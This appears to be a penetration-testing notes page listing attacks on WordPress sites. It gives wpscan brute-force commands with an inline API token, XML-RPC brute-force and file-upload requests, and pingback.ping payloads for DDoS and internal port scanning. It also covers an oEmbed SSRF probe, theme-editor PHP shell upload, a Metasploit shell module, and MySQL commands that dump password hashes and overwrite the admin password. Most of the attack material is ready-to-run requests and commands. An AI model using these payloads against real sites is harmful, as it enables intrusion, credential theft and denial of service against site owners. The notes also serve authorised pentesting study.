> For the complete documentation index, see [llms.txt](https://gcf.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gcf.gitbook.io/notes/pentesting/pentesting-web/wordpress.md).

# Wordpress

## Basic Information

**Uploaded** files go to: <http://10.10.10.10/wp-content/uploads/2018/08/a.txt>\
**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: **\*\*Using** theme twentytwelve **you can** access **the** 404.php **file in**: **\[**/wp-content/themes/twentytwelve/404.ph&#x70;**]\(**<http://10.11.1.234/wp-content/themes/twentytwelve/404.php>**)**  \
Another useful url could be: **\[**/wp-content/themes/default/404.ph&#x70;*\*]\(*<http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\\>\*\*\*

In **wp-config.php** you can find the root password of the database.

Default login paths to check: ***/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/***

## **Enumeration**

```bash
cmsmap -s http://www.48pallmall.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap --url http://www.domain.com --api-token qNzF78w2S7s8QarQ2ISZbNR2Gq4FOmJV05HGjwvRMlM --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
```

### Information Disclosure

Inside the Wordpress folder try to access:

* ***/wp-json/wp/v2/users*** -- This could leak usernames
* ***/wp-json/wp/v2/pages*** -- This could leak IP address

### XML-RPC

If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources.

To see if it is active try to access to ***/xmlrpc.php*** and send this request:

#### Check

```markup
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```

![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)

#### Credentials Bruteforce

***wp.getUserBlogs***, ***wp.getCategories*** or ***metaWeblog.getUsersBlogs*** are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
```

The message *"Incorrect username or password"* inside a 200 code response should appear if the credentials aren't valid.

Also there is a **faster way** to brute-force credentials using **`system.multicall`** as you can try several credentials on the same request:

![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MLAfgNVMwHXqnouOUJz%2Fuploads%2FKeKI5ilkM4UrBzaPI4Wl%2Ffile.jpeg?alt=media)

#### DDoS or port scanning

If you can find the method ***pingback.ping*** inside the list you can make the Wordpress send an arbitrary request to any host/port.\
This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).

```markup
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
```

![](/files/-MLAoI4cF9tbrUDZYXxZ)

If you get **faultCode** with **\*\*a value** greater **then** 0\*\* (17), it means the port is open.

Take a look to the use of **`system.multicall`**&#x69;n the previous section to learn how to abuse this method to cause DDoS.

### wp-cron.php DoS

This file usually exists under the root of the Wordpress site: `/wp-cron.php`\
When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.\
Also, by default, the `wp-cron.php` is called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).

It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval (without causing issues).

#### **Bruteforce**

```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>
```

![](/files/-MLAoI4e__veJ5amhl9z)

![](/files/-MLAoI4fTGRS9OkqV90N)

Using the correct credentials you can upload a file. In the response the path will appears (<https://gist.github.com/georgestephanis/5681982>)

```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
    <methodName>wp.uploadFile</methodName>
    <params>
        <param><value><string>1</string></value></param>
        <param><value><string>username</string></value></param>
        <param><value><string>password</string></value></param>
        <param>
            <value>
                <struct>
                    <member>
                        <name>name</name>
                        <value><string>filename.jpg</string></value>
                    </member>
                    <member>
                        <name>type</name>
                        <value><string>mime/type</string></value>
                    </member>
                    <member>
                        <name>bits</name>
                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
                    </member>
                </struct>
            </value>
        </param>
    </params>
</methodCall>
```

#### DDOS

```markup
<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://target/</string></value></param>
        <param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
    </params>
</methodCall>
```

![](/files/-MLAoI4gV0dF4w8iq-x0)

### /wp-json/oembed/1.0/proxy - SSRF

Try to access <https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net> and the Worpress site may make a request to you.

This is the response when it doesn't work:

![](/files/-MLAoI4hKAW_MsFNBPhj)

### SSRF

{% embed url="<https://github.com/t0gu/quickpress/blob/master/core/requests.go>" %}

This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.

## **Panel RCE**

#### **Modifying a php from the theme used (admin credentials needed)**

Appearance → Editor → 404 Template (at the right)

Change the content for a php shell:

![](/files/-MLAoI4i0zbLBrfWfcdN)

Search in internet how can you access that updated page. In thi case you have to access here: <http://10.11.1.234/wp-content/themes/twentytwelve/404.php>

### MSF

You can use:

```
use exploit/unix/webapp/wp_admin_shell_upload
```

to get a session.

## POST

Extract usernames and passwords:

```
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
```

Change admin password:

```
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```

## \*\*\*\*
